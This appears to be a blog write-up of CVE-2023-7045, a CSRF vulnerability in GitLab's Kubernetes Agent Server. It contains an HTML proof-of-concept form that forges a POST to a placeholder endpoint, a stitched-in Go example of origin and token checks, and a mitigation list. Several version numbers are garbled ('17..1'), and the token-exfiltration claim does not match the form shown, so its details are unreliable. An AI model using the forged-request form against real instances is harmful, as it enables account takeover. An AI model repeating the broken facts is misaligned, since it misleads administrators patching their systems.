CVE-2023-7045 - Cross-Site Request Forgery (CSRF) Vulnerability in GitLab CE/EE Leading to Anti-CSRF Token Exfiltration

A recently discovered vulnerability, CVE-2023-7045, exposes GitLab CE/EE to Cross-Site Request Forgery (CSRF) attacks. All versions from 13.11 before 16.10.6, 16.11 before 16.11.3, and 17. before 17..1 are affected. In this post, we'll discuss the potential impact of this vulnerability, explain how attackers can exploit it, show a code snippet, link to the related GitLab security advisories, and outline mitigation strategies.

Vulnerability Description

The CSRF vulnerability resides in the Kubernetes Agent Server (KAS) component of GitLab CE/EE. By leveraging this vulnerability, an attacker could potentially exfiltrate sensitive anti-CSRF tokens and compromise a user's account. The attack occurs when an unsuspecting user navigates to a malicious website or follows a specially crafted link while logged in to their GitLab account; the browser attaches the user's GitLab session cookies to the resulting cross-site request automatically.

Exploit Details

To exploit CVE-2023-7045, an attacker needs to create a malicious webpage or link that makes unauthorized requests to the victim's GitLab instance. Below is a simple HTML snippet that demonstrates this:

<!DOCTYPE html>
<html>
  <head>
    <title>Exploit CVE-2023-7045</title>
  </head>
  <body>
    <!-- Cross-site form: the browser submits it to the victim's GitLab
         instance together with the victim's existing session cookies -->
    <form method="POST" action="https://gitlab.example.com/kubernetes/agent/some-request">
      <!-- Attacker-controlled form field carried in the forged request -->
      <input type="hidden" name="some_sensitive_data" value="malicious_data" />
      <input type="submit" value="Click Me!" />
    </form>
  </body>
</html>

In this example, https://gitlab.example.com represents the GitLab server URL, and /kubernetes/agent/some-request is the vulnerable endpoint that allows an attacker to exfiltrate anti-CSRF tokens. If a logged-in user clicks the "Click Me!" button, the browser submits the form to the user's GitLab instance with the user's session cookies attached, so the instance processes the request as if the user had issued it.
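To make the defensive side of this concrete, here is an added example (not GitLab's or KAS's own code) of the two server-side checks that stop a forged form submission like the one above: the request's Origin (or Referer) must match the instance's own origin, and every state-changing request must carry an anti-CSRF token bound to the session. The trusted origin, the session store, the cookie name `_gitlab_session`, the token field names and the endpoint path are assumptions taken from or constructed around the page's example; the simulated requests are built in-process with httptest, so it runs offline.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// trustedOrigin is the instance's own origin (assumed, matching the page's example host).
const trustedOrigin = "https://gitlab.example.com"

// newToken returns a fresh random anti-CSRF token bound to one session.
func newToken() string {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return hex.EncodeToString(b)
}

// sameOrigin reports whether the request comes from the instance's own origin.
// Browsers send an Origin header on cross-site POSTs; when it is absent the
// Referer is consulted, and a request with neither is treated as untrusted.
func sameOrigin(r *http.Request) bool {
	src := r.Header.Get("Origin")
	if src == "" {
		ref := r.Header.Get("Referer")
		if ref == "" {
			return false
		}
		u, err := url.Parse(ref)
		if err != nil {
			return false
		}
		src = u.Scheme + "://" + u.Host
	}
	return strings.EqualFold(src, trustedOrigin)
}

// csrfProtect wraps a handler: safe methods pass through, every other request
// must be same-origin AND carry the token stored for its session. sessionToken
// is a placeholder for a real session-store lookup.
func csrfProtect(sessionToken func(*http.Request) string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions {
			next.ServeHTTP(w, r)
			return
		}
		if !sameOrigin(r) {
			http.Error(w, "cross-site request rejected", http.StatusForbidden)
			return
		}
		expected := sessionToken(r)
		got := r.Header.Get("X-CSRF-Token")
		if got == "" {
			got = r.FormValue("authenticity_token") // token field name is an assumption
		}
		// Constant-time comparison so the check itself leaks nothing about the token.
		if expected == "" || !hmac.Equal([]byte(expected), []byte(got)) {
			http.Error(w, "invalid anti-CSRF token", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// Simulate replays three requests against the protected endpoint and returns
// their status codes: the forged cross-site form POST from the page's snippet,
// a same-origin POST missing the token, and a legitimate same-origin POST.
func Simulate() (forged, noToken, legitimate int) {
	token := newToken()
	sessions := map[string]string{"sess-abc": token} // constructed session store
	lookup := func(r *http.Request) string {
		c, err := r.Cookie("_gitlab_session")
		if err != nil {
			return ""
		}
		return sessions[c.Value]
	}
	h := csrfProtect(lookup, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK)
	}))
	post := func(origin, tok string) int {
		form := url.Values{"some_sensitive_data": {"malicious_data"}}
		if tok != "" {
			form.Set("authenticity_token", tok)
		}
		req := httptest.NewRequest(http.MethodPost, trustedOrigin+"/kubernetes/agent/some-request", strings.NewReader(form.Encode()))
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		req.Header.Set("Origin", origin)
		// The victim's session cookie rides along on every request, exactly as in a real CSRF.
		req.AddCookie(&http.Cookie{Name: "_gitlab_session", Value: "sess-abc"})
		rec := httptest.NewRecorder()
		h.ServeHTTP(rec, req)
		return rec.Code
	}
	forged = post("https://attacker.example", "") // constructed attacker origin
	noToken = post(trustedOrigin, "")
	legitimate = post(trustedOrigin, token)
	return forged, noToken, legitimate
}

func main() {
	f, n, l := Simulate()
	fmt.Printf("cross-site form POST: %d\nsame-origin POST without token: %d\nsame-origin POST with token: %d\n", f, n, l)
}
```

The origin check alone already blocks the page's form-based attack, because the browser labels the submission with the attacker's origin; the token check is what keeps the endpoint safe if an Origin header is missing or spoofed by a non-browser client. Both are independent, which is why a regression in either one (as in the KAS component here) should be caught by a request-level test like Simulate rather than by code review alone.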

Original References

To verify the details of CVE-2023-7045 and view the original security advisory, visit the following GitLab resources:

1. GitLab - Security Release: 16.10.6, 16.11.3, and 17..1
2. GitLab - Issue: CSRF in Kubernetes Agent Server

Mitigation Strategies

In order to prevent CSRF attacks and protect users against CVE-2023-7045, GitLab has released updates to patch the vulnerability for affected versions. To mitigate the risk, administrators should do the following:

- Upgrade affected instances to one of the patched releases listed in the GitLab security release (16.10.6, 16.11.3, or the corresponding 17. patch release)
- Harden domain policies and Content Security Policy (CSP) headers as a defense-in-depth measure to limit the routes by which malicious requests reach the instance

By applying these measures, administrators can reduce the potential impact of a CSRF attack leveraging this vulnerability.

Conclusion

The CSRF vulnerability, CVE-2023-7045, poses a significant threat to GitLab CE/EE projects utilizing the Kubernetes Agent Server (KAS). By exploiting this vulnerability, attackers could potentially exfiltrate critical anti-CSRF tokens and compromise user accounts. It's essential for administrators to update their GitLab instances and employ robust security measures to mitigate the risk. In doing so, organizations can safeguard their users and their valuable data against potential cyber threats.

Timeline

Published on: 05/23/2024 11:15:23 UTC
Last modified on: 05/24/2024 01:15:30 UTC